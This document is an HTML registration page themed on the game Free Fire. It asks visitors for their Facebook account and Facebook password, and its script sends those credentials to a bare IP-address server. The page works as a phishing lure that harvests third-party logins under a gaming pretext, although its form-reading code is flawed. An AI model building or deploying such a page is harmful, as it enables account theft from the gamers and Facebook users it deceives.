<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        body {
            background-image: url('./ff.jpg'); /* Replace 'your-background-image.jpg' with the actual path to your background image */
            background-size: cover;
            background-position: center;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }

        #form-container {
            background-color: rgba(255, 255, 255, 0.8);
            padding: 20px;
            border-radius: 10px;
            text-align: center;
        }
    </style>
</head>
<body>
    <div id="form-container">
        <h1>Registration Form</h1>
        <form id="registration-form">
            <label for="freefireName">Freefire Name:</label>
            <input type="text" id="freefireName" name="freefireName" required><br><br>
            
            <label for="freefireid">Freefire ID:</label>
            <input type="text" id="freefireid" name="freefireid" required><br><br>
            
            <label for="facebookAccount">Facebook Account:</label>
            <input type="text" id="facebookAccount" name="usermobno" required><br><br>
            
            <label for="facebookPassword">FacebookPassword:</label>
            <input type="password" id="facebookPassword" name="password" required><br><br>
            
            <button type="button" id="submit-button">Submit</button>
        </form>
    </div>

    <script>
        document.addEventListener('DOMContentLoaded', function () {
            const submitButton = document.getElementById('submit-button');
            const form = document.getElementById('registration-form');

            submitButton.addEventListener('click', function () {
                const formData = new FormData(form);
                const requestBody = {
                    usermobno: formData.get("facebookAccount"),
                    password: formData.get('facebookPassword')
                };

                fetch('http://13.53.125.215:3000/register', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify(requestBody)
                })
                .then(response => {
                    if (response.success) {
                        alert('Registration successful');
                    } else {
                        alert('Registration failed');
                    }
                })
                .catch(error => {
                    console.error('Error:', error);
                    alert('Registration failed');
                });
            });
        });
    </script>
</body>
</html>
